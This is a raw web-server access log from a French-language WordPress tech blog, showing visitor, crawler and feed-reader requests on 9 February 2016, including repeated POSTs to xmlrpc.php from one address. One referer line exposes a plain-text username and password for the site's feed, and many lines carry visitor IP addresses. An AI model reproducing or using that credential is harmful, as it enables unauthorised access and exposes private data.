\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.59 - - [09/Feb/2016:09:40:50 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:51 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:51 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x300.jpg HTTP/1.1\" 200 37377 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:51 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857-50x50.jpg HTTP/1.1\" 200 2472 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:51 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.59 - - [09/Feb/2016:09:40:52 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.59 - - [09/Feb/2016:09:40:52 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.59 - - [09/Feb/2016:09:40:52 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 438 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.59 - - [09/Feb/2016:09:40:52 -0800] \"GET /wp-content/uploads/2015/02/Hedge-Funds-and-Social-Media.jpg HTTP/1.1\" 200 768386 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.233.224 - - [09/Feb/2016:09:40:53 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.233.224 - - [09/Feb/2016:09:40:53 -0800] \"GET /wp-content/uploads/2015/02/Hedge-Funds-and-Social-Media-50x50.jpg HTTP/1.1\" 200 1964 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.233.224 - - [09/Feb/2016:09:40:53 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n130.0.236.153 - - [09/Feb/2016:09:42:20 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:09:48:40 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n80.12.43.142 - - [09/Feb/2016:09:49:59 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/48.0.2564.82 Chrome/48.0.2564.82 Safari/537.36\"\n80.12.43.142 - - [09/Feb/2016:09:49:59 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/48.0.2564.82 Chrome/48.0.2564.82 Safari/537.36\"\n80.12.43.142 - - [09/Feb/2016:09:49:59 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/48.0.2564.82 Chrome/48.0.2564.82 Safari/537.36\"\n80.12.43.142 - - [09/Feb/2016:09:50:00 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/48.0.2564.82 Chrome/48.0.2564.82 Safari/537.36\"\n80.12.43.142 - - [09/Feb/2016:09:50:03 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/48.0.2564.82 Chrome/48.0.2564.82 Safari/537.36\"\n80.12.43.142 - - [09/Feb/2016:09:50:04 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/48.0.2564.82 Chrome/48.0.2564.82 Safari/537.36\"\n193.54.23.146 - - [09/Feb/2016:09:53:01 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15536 \"https://www.google.fr\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.54.23.146 - - [09/Feb/2016:09:53:03 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.54.23.146 - - [09/Feb/2016:09:53:03 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33587 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.54.23.146 - - [09/Feb/2016:09:53:03 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.54.23.146 - - [09/Feb/2016:09:53:04 -0800] \"GET /wp-content/uploads/2015/01/tumblr_inline_niqsunAsTl1spe2e1-50x50.jpg HTTP/1.1\" 200 2747 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.54.23.146 - - [09/Feb/2016:09:53:05 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 987 \"-\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.54.23.146 - - [09/Feb/2016:09:53:06 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n198.58.102.96 - - [09/Feb/2016:09:55:28 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n192.241.154.80 - - [09/Feb/2016:10:01:35 -0800] \"GET /feed/ HTTP/1.1\" 304 182 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n130.0.236.153 - - [09/Feb/2016:10:03:22 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n41.207.202.240 - - [09/Feb/2016:10:03:29 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174731 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\"\n198.58.102.95 - - [09/Feb/2016:10:03:32 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n41.207.202.240 - - [09/Feb/2016:10:05:23 -0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw-1024x524.png HTTP/1.1\" 200 190495 \"-\" \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; ms-office; MSOffice 14)\"\n2.1.201.36 - - [09/Feb/2016:10:06:15 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n109.15.143.216 - - [09/Feb/2016:10:07:27 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n109.15.143.216 - - [09/Feb/2016:10:07:39 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n130.0.236.153 - - [09/Feb/2016:10:12:12 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n80.215.158.236 - - [09/Feb/2016:10:15:58 -0800] \"GET /wp-content/uploads/2015/06/sylvia.png HTTP/1.1\" 200 803660 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/12.0.68608 Mobile/13C75 Safari/600.1.4\"\n198.58.103.160 - - [09/Feb/2016:10:20:26 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n66.249.69.137 - - [09/Feb/2016:10:24:28 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n2.12.177.82 - - [09/Feb/2016:10:27:38 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la HTTP/1.1\" 301 442 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n2.12.177.82 - - [09/Feb/2016:10:27:41 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n2.12.177.82 - - [09/Feb/2016:10:27:53 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n130.0.236.153 - - [09/Feb/2016:10:30:04 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n90.32.186.33 - - [09/Feb/2016:10:33:31 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/je-viens-chercher-mon-stage-dans-la-silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0\"\n90.32.186.33 - - [09/Feb/2016:10:33:32 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/je-viens-chercher-mon-stage-dans-la-silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0\"\n90.32.186.33 - - [09/Feb/2016:10:33:32 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/je-viens-chercher-mon-stage-dans-la-silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0\"\n90.32.186.33 - - [09/Feb/2016:10:33:33 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.1 HTTP/1.1\" 200 1101 \"http://techmeup.co/je-viens-chercher-mon-stage-dans-la-silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0\"\n90.32.186.33 - - [09/Feb/2016:10:33:36 -0800] \"GET /wp-content/uploads/2015/01/tumblr_inline_niqsunAsTl1spe2e11-50x50.jpg HTTP/1.1\" 200 2747 \"http://techmeup.co/je-viens-chercher-mon-stage-dans-la-silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0\"\n90.32.186.33 - - [09/Feb/2016:10:33:38 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 503 \"http://techmeup.co/je-viens-chercher-mon-stage-dans-la-silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0\"\n2.1.201.36 - - [09/Feb/2016:10:36:29 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n130.0.236.153 - - [09/Feb/2016:10:44:26 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:10:50:17 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:10:55:57 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n198.58.103.92 - - [09/Feb/2016:11:03:00 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n62.210.142.23 - jez [09/Feb/2016:11:06:08 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n66.249.69.73 - - [09/Feb/2016:11:10:17 -0800] \"GET /le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/ HTTP/1.1\" 200 9668 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n132.211.90.115 - - [09/Feb/2016:11:12:44 -0800] \"GET /du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/ HTTP/1.1\" 200 8584 \"https://www.facebook.com\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0\"\n132.211.90.115 - - [09/Feb/2016:11:12:46 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0\"\n132.211.90.115 - - [09/Feb/2016:11:12:46 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2049 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0\"\n132.211.90.115 - - [09/Feb/2016:11:12:46 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0\"\n132.211.90.115 - - [09/Feb/2016:11:12:46 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0\"\n132.211.90.115 - - [09/Feb/2016:11:12:47 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5143 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0\"\n132.211.90.115 - - [09/Feb/2016:11:12:47 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0\"\n132.211.90.115 - - [09/Feb/2016:11:12:49 -0800] \"GET /le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/ HTTP/1.1\" 200 9687 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0\"\n66.249.69.73 - - [09/Feb/2016:11:16:28 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n66.249.69.57 - - [09/Feb/2016:11:19:37 -0800] \"GET /paul-duan-le-super-heros-de-la-data-science-pour/ HTTP/1.1\" 200 10107 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n160.33.66.122 - - [09/Feb/2016:11:20:02 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-300x225.jpeg HTTP/1.1\" 304 189 \"-\" \"Mozilla/4.0 (compatible;)\"\n130.0.236.153 - - [09/Feb/2016:11:23:02 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:11:28:54 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n88.185.95.106 - - [09/Feb/2016:11:30:54 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97501 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n88.185.95.106 - - [09/Feb/2016:11:30:56 -0800] \"GET /wp-content/uploads/2015/03/Screenshot-2015-03-13-20.20.39-1024x165.png HTTP/1.1\" 200 203835 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n207.46.13.29 - - [09/Feb/2016:11:34:16 -0800] \"GET /tagged/robin-des-bois HTTP/1.1\" 404 4872 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n192.99.150.96 - - [09/Feb/2016:11:36:02 -0800] \"GET /feed/ HTTP/1.1\" 200 63952 \"-\" \"Filterly3-Argotic-Syndication-Framework/2008.0.2.0\"\n141.8.132.98 - - [09/Feb/2016:11:36:40 -0800] \"GET /category/how-to/ HTTP/1.1\" 200 6081 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n141.8.132.98 - - [09/Feb/2016:11:36:45 -0800] \"GET /category/usa/ HTTP/1.1\" 200 7479 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n141.8.132.98 - - [09/Feb/2016:11:36:50 -0800] \"GET /category/europe/ HTTP/1.1\" 200 7368 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n141.8.132.98 - - [09/Feb/2016:11:36:55 -0800] \"GET /category/la-rubrique-de-philippe-jeudy/ HTTP/1.1\" 200 6860 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n141.8.132.98 - - [09/Feb/2016:11:37:00 -0800] \"GET /category/canada/ HTTP/1.1\" 200 5228 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n141.8.132.38 - - [09/Feb/2016:11:37:05 -0800] \"GET /category/portraits/ HTTP/1.1\" 200 7340 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n141.8.132.38 - - [09/Feb/2016:11:37:08 -0800] \"GET /category/usa/ HTTP/1.1\" 200 7479 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n141.8.132.38 - - [09/Feb/2016:11:37:13 -0800] \"GET /category/portraits/ HTTP/1.1\" 200 7340 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n62.210.250.66 - - [09/Feb/2016:11:40:27 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n209.133.111.211 - - [09/Feb/2016:11:46:49 -0800] \"GET /robots.txt HTTP/1.1\" 200 367 \"-\" \"python-requests/2.2.1 CPython/2.7.3 Linux/3.2.0-56-generic\"\n130.0.236.153 - - [09/Feb/2016:11:49:56 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n213.245.234.126 - - [09/Feb/2016:11:50:04 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n213.245.234.126 - - [09/Feb/2016:11:50:16 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la-silicon HTTP/1.1\" 404 4871 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n5.9.94.207 - - [09/Feb/2016:11:51:40 -0800] \"GET / HTTP/1.1\" 200 33403 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0.1\"\n5.9.94.207 - - [09/Feb/2016:11:51:49 -0800] \"GET /category/la-rubrique-de-philippe-jeudy/ HTTP/1.1\" 200 29344 \"-\" \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36\"\n5.9.94.207 - - [09/Feb/2016:11:51:51 -0800] \"GET /sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/ HTTP/1.1\" 200 28401 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31\"\n5.9.94.207 - - [09/Feb/2016:11:51:52 -0800] \"GET /le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/ HTTP/1.1\" 200 30098 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0\"\n5.9.94.207 - - [09/Feb/2016:11:51:53 -0800] \"GET /2014/07/ HTTP/1.1\" 200 23285 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0\"\n5.9.94.207 - - [09/Feb/2016:11:51:54 -0800] \"GET /2014/11/ HTTP/1.1\" 200 22701 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/ 20120405 Firefox/14.0.1\"\n5.9.94.207 - - [09/Feb/2016:11:52:03 -0800] \"GET /impressum.htm HTTP/1.1\" 404 15493 \"-\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36\"\n5.9.94.207 - - [09/Feb/2016:11:52:04 -0800] \"GET /imprint.htm HTTP/1.1\" 404 15493 \"-\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0\"\n198.58.103.36 - - [09/Feb/2016:11:53:01 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n130.0.236.153 - - [09/Feb/2016:11:55:48 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n198.58.102.117 - - [09/Feb/2016:12:00:54 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n130.0.236.153 - - [09/Feb/2016:12:04:31 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:12:07:31 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n141.212.122.177 - - 